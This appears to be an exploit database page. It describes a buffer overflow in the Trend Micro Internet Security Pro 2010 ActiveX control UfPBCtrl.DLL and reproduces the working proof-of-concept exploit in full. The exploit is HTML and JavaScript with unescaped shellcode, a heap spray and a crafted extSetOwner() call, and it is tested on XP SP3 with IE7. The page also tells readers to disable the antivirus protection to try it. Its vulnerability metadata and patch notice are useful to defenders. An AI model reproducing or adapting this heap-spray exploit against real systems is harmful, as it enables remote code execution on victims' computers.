header-logo
Suggest Exploit
vendor:
Internet Security Pro 2010
by:
Dr_IDE
9,3
CVSS
HIGH
Remote Code Execution
119
CWE
Product Name: Internet Security Pro 2010
Affected Version From: 17.50.0.1366
Affected Version To: 17.50.0.1647
Patch Exists: YES
Related CWE: N/A
CPE: a:trend_micro:internet_security_pro_2010
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Trend Micro Internet Security Pro 2010 ActiveX Unicode Remote Exploit

This exploit is a remote code execution vulnerability in Trend Micro Internet Security Pro 2010 ActiveX. It is caused by a buffer overflow in the UfPBCtrl.DLL component. The vulnerability is triggered when a specially crafted malicious script is executed in the browser. This script contains a shellcode that is used to execute arbitrary code on the vulnerable system. The exploit code is written in JavaScript and uses the extSetOwner() method of the vulnerable ActiveX control to overwrite the return address of the stack frame with the address of the shellcode.

Mitigation:

The vendor has released a hotfix to address this vulnerability. Users should update their Trend Micro Internet Security Pro 2010 to the latest version.
Source

Exploit-DB raw data:

####################################################################
#####

<!--
Title: 		Trend Micro Internet Security Pro 2010 ActiveX Unicode 
Remote Exploit
Version:	UfPBCtrl.DLL ver 17.50.0.1366 (XPSP3 English)
Version:    UfPBCtrl.dll ver 17.50.0.1647 (XPSP3 English) -- Hotfix release
Coded By:	Dr_IDE
Credits:	Abyssec
Tested:		XPSP3 English + IE7
Link:		www.trendmicro.com
Notes:		I only researched/posted this because the original did not 
work for me. Perhaps it's a windows language thing?
Notes:		If you want to try this locally you need to disable the 
"Protection Against Viruses & Spyware" option.
-->

<object ID='target' classid='clsid:15DBC3F9-9F0A-472E-8061-
043D9CEC52F0'></object>
<script>

//payload is windows/exec cmd=calc.exe

shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
                       
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;

while(nops.length < slackspace) nops+= nops;
fillblock= nops.substring(0, slackspace);
block= nops.substring(0, nops.length- slackspace);

while( block.length+ slackspace<0x50000) block= block+ block+ 
fillblock;
memory=new Array();

for( counter=0; counter<200; counter++) memory[counter]= block + 
shellcode;

target.extSetOwner(unescape('%u50A1%u00C7'));
//IEFRAME.DLL [0x00c750a6] = 0a0a0a0a (perfect?), we send just 
behind it

</script>

<!--[pocoftheday.blogspot.com]-->

Navigation

Suggest Exploit

Services By CQR